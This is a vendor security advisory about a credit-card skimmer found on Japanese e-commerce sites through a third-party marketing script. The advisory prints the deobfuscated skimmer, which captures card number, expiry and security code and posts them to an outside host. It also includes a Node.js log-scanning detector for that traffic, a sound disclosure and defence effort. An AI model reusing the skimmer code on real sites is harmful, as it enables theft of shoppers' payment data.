Security Warning: Data Theft Identified

By Vault JS | July 27, 2022

UPDATE: Vault JS believes that the malicious code has been removed. It appears the vulnerability existed on at least July 25 and July 26 (Pacific time).

Since July 25, 2022, Vault JS experts have identified suspicious code on nearly 60 different websites that are running web marketing tools from Showcase-TV. These sites are not currently supported by Vault JS and may be leaking customer data right now. If you are using Showcase-TV, you should consider removing this code temporarily until this is resolved.

The issue comes from JavaScript hosted at navicast.jp. The request to r2.sb/api returns JavaScript code that behaves suspiciously, performing the following actions:

  1. The code attaches to an order confirmation button click event
  2. When the button is clicked, the code scrapes credit card information from the page
  3. The code then posts that information to an endpoint at r2.sb/log_api/log

The code is obfuscated to make this activity more difficult to uncover. Below, we've deobfuscated the portion of the code that concerns our team. As you can see, the code gathers the credit card number, expiration month and year, and security code. It then logs this data. This example is from the payments page of the e-commerce website www.chojyu.com. In addition, our team believes the sites www.ekenkoshop.jp, fig-viper.jp, and scores of other sites have also been compromised.

    $(document)['ready'](function() {
        var _0x4274b8 = _0x46bb68;
        $('input[type=\x27submit\x27][value=\x27ご注文内容の確認\x27]')['click'](function() {
            var _0x4361d6 = _0x4274b8,
                _0x1dae2e = $("input[name='creditCardNo']")['val'](),
                _0x10a67d = $("select[name='enableMonth']")['val'](),
                _0x5606c5 = $('select[name=\x27enableYear\x27]')['val'](),
                _0x17e0f3 = $("input[name='securityCode']")['val'](),
                _0x1dae2e = btoa(encodeURIComponent(_0x1dae2e)),
                _0x10a67d = btoa(encodeURIComponent(_0x10a67d)),
                _0x5606c5 = btoa(encodeURIComponent(_0x5606c5)),
                _0x17e0f3 = btoa(encodeURIComponent(_0x17e0f3));
            $['post']('https://r2.sb/log_api/log', {
                'id': _0x1dae2e, // cc num
                'id_m': _0x10a67d, // month
                'id_y': _0x5606c5, // year
                'id_c': _0x17e0f3, // security code
                'id_f': 'chojyu.com'
            }, function(_0x51ab99) {});
        });
    }));
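For incident scoping, the POST described above can be searched for in captured web traffic such as proxy logs or HAR exports. The following Node.js code is an added example, not Vault JS's code: it flags requests that carry the five form fields from the deobfuscated code and whose `id` value decodes to a card-like number, whether or not the destination is r2.sb. The record format, the `.example` hostnames and the function names are assumptions, and the sample records are constructed.

```javascript
// Added example: field names and endpoint come from the deobfuscated code above;
// the record format, .example hosts and function names are assumptions.
const EXFIL_FIELDS = ['id', 'id_m', 'id_y', 'id_c', 'id_f'];
const EXFIL_HOST = 'r2.sb';

// Undo the skimmer's btoa(encodeURIComponent(value)); null if not decodable.
function decodeField(b64) {
  if (!/^[A-Za-z0-9+/]+={0,2}$/.test(b64)) return null;
  try {
    return decodeURIComponent(Buffer.from(b64, 'base64').toString('latin1'));
  } catch (e) { return null; }
}
// Luhn checksum, used to tell a card number from an ordinary identifier.
function luhnValid(digits) {
  if (!/^\d{12,19}$/.test(digits)) return false;
  let sum = 0;
  for (let i = 0; i < digits.length; i++) {
    let d = Number(digits[digits.length - 1 - i]);
    if (i % 2 === 1) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
  }
  return sum % 10 === 0;
}

// Finding for a request shaped like the exfiltration POST, else null (last 4 digits only).
function classifyRequest(rec) {
  if (rec.method !== 'POST') return null;
  const params = new URLSearchParams(rec.body);
  if (!EXFIL_FIELDS.every((k) => params.has(k))) return null;
  const pan = (decodeField(params.get('id')) || '').replace(/[\s-]/g, '');
  const knownEndpoint = new URL(rec.url).hostname === EXFIL_HOST;
  const cardLike = luhnValid(pan);
  if (!knownEndpoint && !cardLike) return null;
  return { url: rec.url, site: params.get('id_f'), knownEndpoint, cardLike,
           panLast4: cardLike ? pan.slice(-4) : null };
}

function scan(records) { return records.map(classifyRequest).filter(Boolean); }
// Constructed sample traffic (test card number 4111 1111 1111 1111).
const enc = (s) => Buffer.from(encodeURIComponent(s)).toString('base64');
const form = (o) => new URLSearchParams(o).toString();
const card = { id: enc('4111 1111 1111 1111'), id_m: enc('07'), id_y: enc('2025'),
               id_c: enc('123'), id_f: 'shop.example' };
const sampleRecords = [
  { method: 'POST', url: 'https://r2.sb/log_api/log', body: form(card) },
  { method: 'POST', url: 'https://cdn.example/collect', body: form(card) },
  { method: 'POST', url: 'https://stats.example/event', body: 'id=abc&page=cart' },
];
console.log(scan(sampleRecords));
```

The `id_f` value in each finding names the storefront the data was taken from, which helps map hits back to affected sites.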

Please follow our LinkedIn page for ongoing updates. In addition, you can request a free analysis of your own site to uncover any suspicious code or data leaks that might be happening right now through your third party tags.